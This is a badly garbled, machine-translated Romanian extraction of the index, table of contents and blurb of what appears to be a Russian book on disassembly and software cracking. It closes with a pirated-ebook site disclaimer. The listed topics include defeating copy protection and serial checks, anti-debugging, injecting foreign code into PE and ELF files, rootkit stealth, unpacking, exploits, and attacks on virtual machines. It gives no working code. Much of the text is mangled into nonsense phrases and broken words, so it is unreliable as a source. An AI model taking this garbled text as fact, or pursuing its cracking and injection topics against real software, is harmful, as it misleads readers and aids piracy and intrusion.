brută, Dimensiune brută, RC , , , RDF, Rdoff, Red Hat, RedHat Enterpnse Linux V , Update , RHEL RHEL , Regmon exe, , , , , , , , Adresa virtualărelativă, Relox, Procedură la distanță Cails, Resource Hacker, , Resporator Resource Resource, Ring Ring , Robert Goldberg, ROTL , ROPZHAZZBA, Ropzhazza RPC Spying, RTL, , RTTI, Ruby, RVA, , S S U S E, STROKA SALT, SCSI, , SDT, , SDTRESTORE, , Secțiune Mașinăvirtuală securizată, tabelul de antet al segmentului , SEH, , , , Filtru, Fram, , încadrare Fighting, SENTINEL, DESCNPTION DE SERVICII, Configurare SFC, , , Sha , SHA- , Shareware, , Shell-Code, , , , , , în ASCII-RAPORTING, Dizissemble, Enchanted, Livrarea Managementului Managementului, Shiva, , , Sign Flag, Silvervale, Slackware, SMP, , Softice, , , , , , , , , , , , , , , , , , , , , , , , Software, Software Passport, , , Solans, Sony, Sourcer, , Sparc, , , , Sparc , Spices Decompiler, SPIN LOCKS, Spyxx, , SSE , , , SSEII, , SSE I , SST, STABS, Star Force , , , Cod de pornire, , STDCALL, , VIRUSURI SEALTHE, STEALTHTechnologies, , Strip Strip, Structurat Excepție Manevrare, , , SVM, Symmetnc Multi-Processing, Sym-Naфайл, Syser Debugger, , Syslog, System Descriptor Table, System File Chccker, Sistem Service Table Table , T TASM, , , TASM +, TCP, TCP/ P, , , TCP P SYS, TCPView, Teleport Pro, Telock, The Bat, The Dude, Themida, , , , , Tlink, Think , TomaszGrysztar, , Toolhelp , Total Commander, Trap, Trap Trap Tnalfrezer, Truss, , Turbo Debugger, , , , , Turbo Pascal, Turion , , U UDP, Ulink, , Unicode, , Universtits of Cambridge Research Research Grup, Unix, , , , , , , , , , , AP , pseudo-drugs, Unix mheader , Unix Nuxbe quiit, UNIX- Dumers, Upx, , , , , , , , , , , Signatures, dispozitive USB, User dll, , , U-Parol, , V VA, Vanderpool, , , VB Decompiler, VB Rezq, VBS VBS, VENSIGN, foartepdf, consolă în modul VGA, VI, Video S, Adresa virtuală, Virtual Machme Monitor , , Bloc de control al memoriei virtuale, PCvirtual, , , , PC virtual , Dimensiune virtuală Virtual Table, VirtuahZation Technology X, Visual Basic, , , Visual Studio Express, Visual Studio Express, VM Ware, VM Ware , VMC, VMC, VMC, VMC , VMC, VMC, VMC, VMC, VMC, VMC , , , VMware, , , , , , , , , , , , , Interfață Backdoor, , player, server, de atacuri prinfolderul HTT, Securitate, Stop Virtual Machine, Relocarea unui fișier arbitrar, Execuția la distanță acodului arbitrar, VMware VMware , VMware ASE, VMware ESX Server, VMware GSX SVERVER, VMware Player, Obiecte, Obiecte Indicatorul VMware Virtual Platform, VMware WorkStation , VTBL, VT-X, , W W K KILL SYS , W K LOAD, W K LOAD EXE, W DASM, WATCOM, WATCOM C, , WATCOMC, , WATCOM C, , , , , Watcom C ++, WDB, WDF, WM , , , Win API, WM K Sys, WMDBG, , Windows, , , -pată Versiuni, versiuni, versiuni pe de biți, Protecția fișierelor de sistem, Schimbarea logo-ului de încărcare, HAC Nucle, Windows , , , , Windows /HP/ , Windows Server, Windows X, Windows X, , , Windows X/NT, Windows Driver Foundation, WindowsInstallshield Dechield, Windows NT, , Sistem executiv, Structura de bază, Windows NTS NTT -Bittic / XP, модификация я дра, Windows PE, , Windows Platform SDK, Windows Server , WindowsServer SP , Windows Server Longhom, Windows Update, Windows Vista, , , Windows XP pe de biți!Ediție, , Wine, Winhex, Winnt H, Winrar, , Wmsock, x x , , , , x emulator, x - , , , , , Mod pe de biți, Mod de compatibilitate, Mod Legacy, Mod Long, Acord privind transferul rapid de parametri, emulare, X-VOKH, Hep, , , Cod sursă, HEPCommunity, Editor de resurse XN, x Artibut, , la nivelul paginilor, X-Code, , , , Implementare în coada secțiunii, Distribuție de exploziv, implementat incorect, Prevenirea prevenirii a de exploziv Reimplementare Crearea suprapusului, Metode de implementare, Y YASM, , , Z Zero Flag, ZX Spectrum, , ZX-spectru, A memorie de memorie, meșteri autonomi, de coduri autonomă, Verificatori autonomi, Patching autonom, Adresa: Indirectă, Direct, Adresarea variabilelor locale, Spațiu de adrese, Analiza algoritmului de protecție, algoritm de compresie RLE, , LAMPEL-ZIVA, Huffman, Antivirusuri, , , Tehnici anti-aterizare, Cod anti-landare, Virtualizare hardware, , , , , , Hardware of the Stop, Argumente identificate, Arhitectură: -bit, criptografie asimetrică, asamblator, macro-uri, de asamblare la nivel înalt, inserții de asamblare, , Funcții de asamblare, funcții de bibliotecă, analiză, identificare, biți, , Procesul procesului procesului, Pointer substanțial al lui Brandmaura, , , Personal, Bruce Kogswell, comparații Bulevsky, Operațiibooleane rapide, Optimizare, Comparație de numere străine, hacking prin hacking prin intermediul Acoperirea, Hack Alinierea virtuală a secțiunilor, Virtual: Discuri, Tabele, , Identificare, de exemplare, Funcții, , Adresă virtuală, Designer virtual, Dimensiune virtuală, Virusuri, , , Operatori NYE de la alegere multiplă, variabile temporare, Zona de vizibilitate, alocare a memoriei, calcule cu un punct flotant, g de generatoare de taste, , generatoare de producție, Hipervisor, , , , Obiecte globale, Variabile de obiecte globale, granițe ale definiției echipelor de mașini, D dedumps, îndepărtarea la nivelul nucleului, îndepărtare din aplicații protejate, Dumers, opoziție, dedecompilare, copaci, echilibre, distructor, Identificare, Gerald Papeck, Dizassembler Lungime, DizAssemblers, , , Interactive, Pachete, Dizassembing, Debugging dinamic Biblioteci, TabeleleTabelului Segmentelor, SECȚIUNI Tabel, Elf-Files, , Protecție și Protecție și Protecție și Protecție Perioada de testare, Număr de serie, , mecanisme de protecție pentru hacking, pe baza numerelor deînregistrare, bazate pe proprietate, pe baza cunoștințelor, Protecția Kirchhof, , COPS protejați aicupruluiINISH, de valori returnate de Fuilition de indicție, și Ilfac Hilphanes, Indend al derivatelorfuncțiilor, interpreți, Excluderea rugăciunii pentru Freim, Kwin Lawlon, Format clasic al Codului ObiectUNIX, cheie cheie Discuri, Structuri cheie ale limbajului limbajului limbii mari de nivel Fișiere cheie, cod: rău intenționat, coduri de RIDA-SOLOMON, Opcodes 'Coasters, Compilers, Non-optimizant, Optimizare, , Designer, Identificare, Gol, Copiere la înregistrare, Pilula roșie Cryptanaliză, Cryptography, , , Asimetric, Crypto Protection, L LEMPELE-Ziva Algoritm, LicențăGNU, Apărare logică, Operații logice Afișare pentru copaci, Condiții logice, Trigologie falsă, , Localnici locali Variabile, Adresare, Inițializare, Plasament în Stack, M Mark Russinovich, , masivele, Matematică Identificarea operatorilor, Turing Machine, , Virtual Memory Manager, Mecanism de urmărire a returului, Mecanisme de implementare în clasificarea re-fișierelor, Mecanisme de protecție a clasificării, de mecanismepentru transmiterea argumentelor, Modificarea fișierului de balansare la nivelul sectorului, Virtual MonitorCars, , Subiect de h moștenire cu un conflict de nume, Funcții Nevirtuale, Valoare directă, Determinarea directă a operandului, Direct Pointer, pe zona de date, de cod, Access Access Procesor, Obstacorii Înlăturarea îndepărtării Obstacole, , Format general al modulului obiect, de obiecte, Identificare, Suprapunere, OOP, Case de operator, Operator continuu, Identificarea comutatorului, Operatori noi și ștergeți, Optimizarea sucursalelor, Punct de intrare original original original original, Deschiderea cadrului stivei, Fold Information, Ștergeți, imprimare cu de ori, Debateri, , Detecție, , , Adresa virtuală relativă, Erori de preaplin Boofer, P Pachet Hutch, Memorie nucleară:modificare, Verificare corectă, Patching: Autonom, Online, Prima secțiune File, Transmitereaargumentelor funcției prin Stack, prin registre, legături încrucișate, , variabile în stivă, PeterAnvin, Peter Veenstra, Software: Maleovion, Module conectate, Căutare a vulnerabilităților, Ultimasecțiune a fișierului Regula Kirchhof, Probleme de reinstalare, de verificare a verificării, Prolog, , Funcții optimizate, Protectoare, Îndepărtare, Funcție de restaurare a prototipului, Profiluri, Excluderea procesului din lista sarcinilor , r Promovarea stivelor, algoritm de lucru de nepătruns, Reversing, Identificarea variabilelor de înregistrare, Registre, , însoțire matematică, multimedia, debuguri, segment, Register, , , , , , , , , Monitorizare, Robert Goldberg, RustemFasikhov, Rutkin, , Compilare manuală, cu Sven Shreiber, Secțiune: Atribute, Office, Semafore, , Serial Serial Numere de serie, de certificate, de viermi de rețea, Petri Network, , Ecran dedeces albastru, Signature, Sintaxă: AT&T, Intel, Blue Pill, Secțiunea următoare a secțiunii, Sniffer, Acorduri Apel rapid, la transferul parametrilor, de blocare spin, Acord standard, , Codde pornire, , Variabile statice, Stack, , Adresa de argumente, echilibrare, Executabil, incomplet, , Promovare, Consultări, , Stele Technology, Steve Hatcheson, Etape Image, Strelka Pierce, , linii: Identificare, Tip Procesare de excepție structurală, , Structuri, Identificare, tone de tone Tabelul transcriptorilor întreruperilor, Tabelul elementelor motive, Secția defișiere curente, Tehnologie de protecție a datelor, Subiect Tomash Grishtar, Punct de intrare, , Puncte de oprire, , Hardware, , , pe Ari -Funcții , pe date, pentru mesaje, software, deramuri difuzate, Tracers of the Zero Ring, Trace, Cai troieni, Bust Dull, au indicatorul de , , , , , Identificare, Pacificors, Condiții: Componente, Elementar, Condiții de relații, Identificarea operatorilor condiționali, Tranziții condiționate, , F Fișier de balansare: Modificarela nivel sectorial, Monitorizare Filemate, Monitoare de fișiere Adresa fizică a începutului secțiunii, Mărimea fizică a secțiunii, aliniere fizică a secțiunilor, steag: semn, zero, transfer, overflow, Înregistrare, instalare, de coastă ale hainelor, format de execuție și aspect, Format al modululuiobiect, Format de informații despre film, funcții, apeluri cu argumente implicite, identificare, Prolog A se vedea Epilog, Funcție: Dllmain, Identificare, Identificarea aplicațiilor Windows Main Console, Winmain, Identificare, X Algoritm Huffman, C Cycles, , Endless, investit, cu o presupunere de cu post-susținător , s s Stare la mijloc, cu un contor, semnături digitale, Horvi, , Morris Worr, Funcție virtuală pură, SH Editori hexagonali, Criptare dinamică, Spies, e copii ale luiobiecte Exploite, Dizassembbing, , emulatoare, vulnerabilități, Epilog, , Yuri Kharon, Suntfuncții nucleare de la nivelul aplicat, Nuclei multiprocesor, Tabele de tuburi Introducere Partea I Revizuirea programelor hackerilor Capitolul Instrumentele hackerilor Debuggeri DizAssemblers decompilatoare editori hexadecimali nepacheți Dumper RENERS OF RESURSE spioni Monitoare modificatori COPYRFIRERI DE DIPROTECTATSKOV Capitolul Emularea debugerilor și a emulatorilor Informații introductive despre emulatoare Recenzie istorică zone de utilizare a emulatorilor virtualizare hardware Prezentare generală aemulatoarelor populare dosbox Bochs și Qemu VMware Microsoft Virtual PC Xen Cei mai apropiați concurenți Alegerea unui emulator adecvat Protecția Expandabilitate Disponibilitatea textelorsursă Calitatea emululării construit -in debugger Tabelul rezumat al caracteristiciloremulatoarelor Tabelul din Tabelul capitolului Instrumente de hackeri pentru UNIX șiLinux Debuggeri DizAssemblers Spionii editori hexadecimali Lada lERA Cele ascunsePotențialul ansamblurilor manuale Pregătire filozofică STEP -TY -PEP Instrucțiuni Mergem la adunare Instalare Concluzie Capitolul Asamblatori Filosofia asamblatorului Explicația asamblatorului pe exemplecu de asamblare inserții ca un suport de testare Instrumentele necesare Comparațiatraducătorilor de asamblare OSCriterii noi -lansare MASM Tasm Fasm Nasm Yasm Programare pe asamblator pentru Unix și Linux Concluzie Link -uri către produsele menționate ……………………………………… Partea a II -a Tehnicieni de bază de hacking Capitolul Introducere în mecanisme de protecție Clasificarea protecției de către genul The Secret Key Fiabilitatea protecției Dezavantajele „Boxed” finisate Soluții Erori comune ale implementării mecanismelor de protecție Protecția împotriva copierii și distribuției neautorizate a numerelor de serie Protecția printr -o perioadă de încercare și slăbiciunile sale Reconstrucția algoritmului Recomandări generale Protecția împotriva modificării Nadisk și în memorie Contrareing Dizassembler Tehnici anti -landing Antimonitori Combaterea lui Dumper mici ratări care duc la consecințe grave Tabele Capitolul cald -up Creăm protecție șiîncercăm să o pirateze Cunoașterea cu Dizassembler pachete DizAssemblers și DizAssemblers interactive pentru utilizarea DizAssemblers -ului pachetului de la EHE la CRK dintr -un exemplu practic de hacking Supresie nag-ecran Înregistrare forțată Concluzie … Capitolul Cunoașterea cu depanarea Introducere în depanare DizAssessembler și Debugger într -o singură echipă Puncte de oprire afuncțiilor ARI puncte de oprire pentru mesaje puncte de oprire a datelor Promovarea de etapă DLLDebugging Concluzie Capitolul Caracteristici de depanare în UNIX și Linux PTRACE - Fundația pentru GDB Biblioteca Ptrace și echipele sale Suport pentru multi -SEAT în GDB Ghid scurt pentru GDB ■ Urmărirea apelurilor de sistem Debugarea fișierelor binare în GDB Pregătire pentru depanare Începem să urmărim IMersiunea în tehnica și filozofiaGDB Concluzie Capitolul Caracteristici ale depancării termonucleare cu linia Cerințe de sistem Linice de comperare și configurare Încărcarea sistemului și pornirea Debuggerul Fundamentele din Lucrul cu Linice Capitolul Discuții extinsedespre problemele de depanare O ușoară caldă -up maicomplex Filtre ……………………………………………………… Urmărirea animată în Softice Debugger Windbg ca ARI și RPC Spy Prima cunoaștere cu Windbg TEHNICA ARI-SHPIONAGE Tehnica despire a RPC Cuprinsul trucurilor hackerului cu puncte arbitrare ale opririi Secretelepasului -To -pasptor Hacking prinacoperire Ideea de ghid Alegerea Instrumente Algoritmipentru determinarea acoperirii Alegerea abordării Exemplu de hacking Concluzie Partea III Identificarea structurilor cheie ale limbilor de nivel ridicat………………………………………………………………………………………………………………………………… Capitolul Identificarea funcțiilor Metode pentru recunoașterea funcțiilor legături încrucișate Identificarea automată a funcțiilor cu ajutorul IDA RGO Prolog………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………Da Epilog „Naked” (Naked)Funcții Identificarea funcțiilor încorporate (Iniine) modele de memorie și compilatoare pe biți Capitolul Identificarea funcțiilor de pornire Identificarea funcțieiWinmain IdenticăSunt funcții dllmain…………………………………………………………………………………………………………………………………………………………………………………… Identificareafuncției aplicațiilor Windows Console Capitolul Identificarea funcțiilor virtuale Identificarea funcției virtuale pure Utilizare comună a tabelului virtual cu mai multe copii ale obiectului Copii ale tabelelor virtuale Listade slose Apelați prin Gateway Un dificil Exemplu, când funcțiile non -reverse se încadrează în tabelevirtuale Legare statică Identificarea derivatelor derivatelor Identificarea tabelelor virtuale Capitolul Identificarea proiectantului șiDistructor Obiecte în memorie automată- o situație în care un proiectant/distructor nu poate fi identificat Identificarea proiectantului/distrugătorului în obiecte globale Distructor virtual Designer virtual Timpuri de proiectare, designer doi Designer gol Tabelul Cuprinsului Capitolul Identificarea obiectelor, structurilor și tablourilor Identificareastructurilor Identificarea obiectelor obiecte și copii Adresa mea nu este o casă și nu o stradă CAPITOLUL Identificare acest lucru CAPITOLUL Identificarea noului și ștergerii Identificareanoului Identificare Ștergeți…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………Da abordări pentru implementarea mormanului Capitolul Identificarea funcțiilor bibliotecii Capitolul Identificareaargumentelor funcțiilor Acorduri privind transferul parametrilor Obiective și obiective Determinarea cantității și tipului de transmitere aargumentelor Adresa argumentelor din stivă Acord standard - stdcall Acord CDECL Acord Pascal Provocări rapide - FastCall ApeluriAgiscall și acordul de apel implicit Argumente implicite Tehnici pentru studiul mecanismuluipentru transmiterea argumentelor de către un compilator necunoscut Capitolul Identificarea valorii returnate defuncție returnarea valorii Return operator Return of material meanings Returnarea valorilor prin funcții deasamblare construite Returnarea valorilor prin argumente transmise prin referință Returnarea valorilor printr -o memorie dinamică (grămadă) Returnarea valorilor prin variabile globale Returnarea valorilor prin intermediul Steagurile procesorului Capitolul Identificarea sticlei locale Variabile Abordarea variabilelor locale Detalii, implementare tehnică Identificarea mecanismului de izolare a memoriei Inițializarea variabilelorlocale Plasarea tablourilor și structurilor Aliniere în stivă caIda Pro Identifică variabilele locale…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………reușță la cadru Capitolul Registrul de identificare și variabileletemporare Variabile de înregistrare Variabile temporare ……………………………………… Crearea de variabile temporare la trimiterea de date și Calculareaexpresiilor Tabelul de conținut al creării de variabile temporare pentru a păstra valoarea datorată funcției șirezultatele calculării expresiilor Zona de vizibilitate avariabilelor temporare Capitolul Identificarea variabilelor globale Tehnica de restaurare a referințelor încrucișate Monitorizarea apelează la o căutare contextuală variabilă globală a deplasării lor în segmentul de cod [Data] Differences from the constants and signs O abordare indirectă a variabilelor globale Variabile statice Capitolul Identificarea constantelorși deplasărilor Determinarea tipului de operand direct Cazuri complexe de adresare sau operații matematice cu semne Procedurăpentru Indici și semne Utilizare de Lea pentru a adăuga constantă Identificarea „vizuală” a constantelor și semnelor Capitolul Identificarea literelor și liniilor tipuri de linii S-STRAKS DOSSTRINGS Pascal începe Tipuri combinate Determinarea tipului de linii Turbo- Inițializareavariabilelor de coarde CAPITOLUL ID IDENTIFICARE IF - CE - ALTE Tipuri de condiții O reprezentare vizuală a condițiilor dificile sub forma unui copac Studiul implementărilor specifice Comparațiavalorilor întregi Comparația materialuluiNumere Echipe condiționate ale boolery Instalare Alte comenzi convenționale Comparații Bulevsky Identificarea operatorului condiționat "(condiție)?B N: SOPWYPIA" Caracteristici ale tranziției condiționate în -Modul bit Exemple practice Optimizarea ramurilor Capitolul Identificarea structurilor Switch - Caz - Break Identificarea operatorilor de plural Diferențecomutatoare și operator de caz Limbajul Pascal Tăiere (echilibrare) a copacilor lungi Cazuri complexe de echilibrare sau optimizare a echilibrării ramuri în cazurile de dezvoltare Capitolul Identificareaciclurilor Cicluri cu o precondiție Cicluri cu o postcryption Tabelul tabelului Cicluri cu un contor Cicluri cu starea la mijloc de cicluri cu mai multe condiții de ieșire de cicluri cu mai multecontoare Identificare continuă Condiții dificile……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………… Da Cicluri investite Demontare frunze deexemple Capitolul Identificarea operatorilor matematici Identificarea operatorului + Identificarea operatorului Identificareaoperatorului/ Identificarea operatorului % Identificarea operatorului * Operatori complexi Partea IV Metode avansate DizAssMitting Capitolul Demontare de re-fișiere pe de biți Caracteristici ale structurii re-fișierelor în implementări specifice Concepte și cerințegenerale pentru re-fișiere Structura re-fișierului Tehnica de implementare și eliminarea codului din re-fișiere Conceptul de x -Code și alte convenții Obiectivele și obiectivele codului X Cerințe pentru codul X Implementare din codul X …………………………………………………… Prevenireare -implementării Clasificarea mecanismelor deimplementare Categoria A: Spații gratuiteDespre fișier Categoria A: Implementare prin comprimarea unei părți a fișierului Categoria A:Crearea unui nou flux NTFS în fișierul Categoria B:Descărcarea unei părți a secțiunii în excesiv Categoria B: Crearea proprieiexagerate Categoria C: Extinderea ultimei secțiuni de fișiere Categoria C: Crearea propriei secțiuni Categoria C:Extinderea secțiunilor din mijloc a Fișierul Categoria Z: Implementarea prin DLL -ulîncărcat automat CAPITOLUL DESASAMBLE DE Fișiere ELF pentru Linux și BSD Instrumentele necesare Structurafișierelor ELF Implementarea unui cod extraterestru în elf-Fișier Infecție prin absorbția fișierului Infecție prin extinderea ultimei secțiuni de fișiere Compresia unei părți a fișieruluioriginal Infecție prin extinderea secțiunii de cod afișierului Tabelul conținutului de deplasare a secțiunii de cod în jos Crearea propriei secțiuni Implementare între fișier și rubrică Un exemplu practic de introducere a codului străin în fișierul ELF Caracteristici ale Dizassembbing pentru Linux folosind exemplul de minusculă-crackme Studiul puzzle-ului minuscul-crackme Concluzie Capitolul Arhitectură x - sub bisturiul asamblatorului Introducere necesar Instrumente Revizuirea arhitecturii x - Tranziție lamodul pe de biți ……………………………………………………………………………………………………………………………………………………………………………………us Program „Bună ziua, lume” pentru x - Capitolul Studii ale nucleului Linux în afara nucleului Furtunade nucleu în interiorul nucleului unde se cuibăresc erorile Secretele kernelului haking Schimbați logo -ul Linux Capitolul Metode moderne de patching Secrete depatching online Cel mai simplu Patcher on-line Regulament ……………………………………………………………… Interceptarea funcțiilor ari Ca sistem de semnal Hardware de oprire Little -cunoscute modalități de a hack programeclient Revizuirea căilor de hacking Modificare fără a schimba octeții Hack Nucleus Windows NT/ /XP Structuranucleului Tipuri de nuclee Metode de modificare Nuclei Modificarea logo -ului de încărcare Există vreo viață după BSOD? Depășirea BSOD folosind softice Recuperare automată Cât de sigur este utilitatea anti-BSOD? Concluzie CAPITOLUL DESASAMBLE DE Fișiere a altor formate DISASEMBGING FILE PDF Ce promite Adobe Acrobat neconformiști Modificare Adobe Acrobat Hacking folosind ecran de imprimare devin poligloti Structura fișierului PDF Tabelul tabelului din Cuprins Jucând cheia de criptare Atac asupra U-Parolului PractParolă de hacking pentru ochi PDF Resurse interesante PARTEA V CORD PRACTIC -CADAPACITATE CAPITOLUL Tehnicianti -delanding și o ascunzătoare și căutați Windows și Linux Tehnici anti -deliere vechi pentruWindows într -un mod nou Programul instruit cu sine Exemple anti -landare bazate pe accesul la memoria fizică Cum win k/xp SDT RestoreWorks Tehnologii Stealth în World Windows………………………………………………………………………………………………………………………………………………………………………………………us Pilula albastră și pastilă roșie - ferestre blocate în matrice albastru Pilyulya Pilula roșie Tehnologii Stealth în lumea Linux Modul Times, modul doi Excluderea procesului din lista de sarcini Apeluri desistem de interceptare Interpretările cererilor către sistemul defișiere Când modulele nu sunt disponibile Alte metode de luptă Link -uriinteresante pe tema aburului Inelul de captare în Linux Moduri cinstite Hacking ………………………………………………………… Gaură în dintele albastru sau Kernel BluetoothBluetooth Exploit elfi cad în depozitele de gunoi Probleme de multi -Sheating Obținem rădăcină pe mașini multiprocesor CAPITOLUL revărsarea tamponului însisteme cu un pahar neîmplinit Dep de configurare Probleme de compatibilitate Atac asupra DEP în tabăra Unix BufferShield sau Rah pe Windows ………………………………………………………………………………………………………………………………………………………………………… Resurse interesante Capitolul Lupta împotriva pachetelor Analizapreliminară Dezambalarea și alternativele sale Algoritmul de despachetare în căutarea OER Program Dump Live Căutați codul de pornire prinsemnături în memorie Câteva moduri populare, dar nereușite: GetModuleHandlea și GS: Efecte secundare ale pachetelor Sau de ce nu funcționează virtuAiprotect Metoda decăutare universală pentru ORA, bazată pe echilibrul stivei Tabelul tehniciiÎndepărtarea IKADAMPA din aplicații protejate Cazuri simple de găluște în căutarea dvs Dump din exterior Mecanisme de decriptare dinamică Dump din interior Trucuri murdare ………………………………… Link -uri utile pachetede fișiere executabile în Linux/BSD și lupta împotriva lor Pacificors and Performance ELF-CRYPT Upx Burneye Shiva Comparația pachetelor Capitolul Obhuscation și depășirea sa Cum Obuskator funcționează Cum se rupe dezvăluind codul BlackBox Temnițele mașinii virtuale Viitorul obstației CAPITOLUL Detectarea, depanarea și dizassemblicarea programelor rău intenționate Timpul lasă și imprimeuri Arborele proceselor Interogarea fluxurilor Restaurare SST Exploite de audit și DizAssempling ca exploate disecții Analizaexploatării pe un exemplu practic Cum se rulează codul de debugger Concluzie Link -uri interesante Capitolul Atac asupraemulatorilor Atac prin intermediul rețea virtuală……………………………………………………………………………………………………… Atac prin folder htt Atac prin interfața din spate Cele mai recente exploatări pentru mașini virtuale VMware: execuția la distanță a codului arbitrar VMware: Execuția ladistanță a codului arbitrar II VMware: relocarea arbitrară Fișier Demolarea mașinilor virtuale din interior Indicator subiect Chris Kaspersky, Eva Rocko Dizassimbbing, cartea este dedicatăproblemelor și metodelor de dizassembing, ale căror cunoștințe își vor proteja eficient programele și vor crea codurisoftware mai optimizate Sunt afișate diverse abordări ale analizei algoritmului programului, iar recomandările suntoferite cum să nu vă pierdeți în megabytii codului dezasamblat și să evitați o varietate de capcane Sunt demonstrate olargă privire de ansamblu a instrumentelor populare de hacker pentru Windows, UNIX și Linux, straturi, dizassemblers,editori hexadecimali, spioni ARI și RPC, emulatoare - și tehnici practice pentru lucrul cu ei O atenție semnificativăeste acordată subiectelor de reconstrucție a algoritmilor activității mecanismelor de protecție și identificăriistructurilor cheie ale limbilor cu nivel înalt, cum ar fi C/C ++ și Pascal Sunt luate în considerare metodele practicede depășire a tehnicilor anti -deliere, tehnica de eliminare a depozitării de la aplicațiile protejate, depășireapachetelor și protectoarelor Exemplele arată metode de analiză a codului programelor și exploatărilor răuintenționate CD -ul conține un cod de program de exemple luate în considerare în carte BHV-Petersburg SanktPetersburg Sf YESENINA, B E-GPAI: mail@bhv ru Internet: www bhv ru tel /fax: ( ) - ISBN - - - - ​​Acest fișier a fost preluat de pe site HTTP : // // all-ebooks com Acest fișier este prezentat exclusiv în scopuriintroductive După ce vă familiarizați cu conținutul acestui fișier, ar trebui să îl ștergeți imediat Prin salvareaacestui fișier, sunteți responsabil în conformitate cu legea Orice utilizare comercială sau altă utilizare, cu excepțiaprevizualizării interzise Publicarea acestui document nu urmărește niciun beneficiu comercial Această carte contribuiela creșterea profesională a cititorilor și este o reclamă pentru publicațiile pe hârtie Toți drepturile de autor aparținproprietarilor lor respectați Dacă sunteți autorul acestei cărți și distribuția acesteia încalcă drepturile de autor saudacă doriți să faceți modificări la acest document sau să publicați o nouă carte, contactați -ne prin e -mail 